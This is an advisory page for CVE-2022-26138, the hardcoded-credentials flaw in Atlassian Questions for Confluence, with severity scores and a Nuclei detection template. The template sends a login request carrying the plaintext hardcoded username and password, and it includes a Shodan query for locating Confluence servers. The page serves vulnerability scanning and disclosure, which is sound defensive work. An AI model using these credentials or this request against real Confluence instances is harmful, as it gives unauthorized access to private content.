Atlassian Questions For Confluence - Hardcoded Credentials

2022-07-2115:23:23

ProjectDiscovery

github.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.972 High

EPSS

Percentile

99.8%

JSON

Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.

id: CVE-2022-26138

info:
  name: Atlassian Questions For Confluence - Hardcoded Credentials
  author: HTTPVoid
  severity: critical
  description: |
    Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance.
  remediation: |
    Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials.
  reference:
    - https://twitter.com/fluepke/status/1549892089181257729
    - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26138
    - https://jira.atlassian.com/browse/CONFSERVER-79483
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26138
    cwe-id: CWE-798
    epss-score: 0.97262
    epss-percentile: 0.99834
    cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: questions_for_confluence
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve2022,cve,confluence,atlassian,default-login,kev

http:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action

    payloads:
      os_username:
        - disabledsystemuser
      os_password:
        - disabled1system1user6708
    attack: pitchfork
    matchers:
      - type: dsl
        dsl:
          - 'location == "/httpvoid.action"'
# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950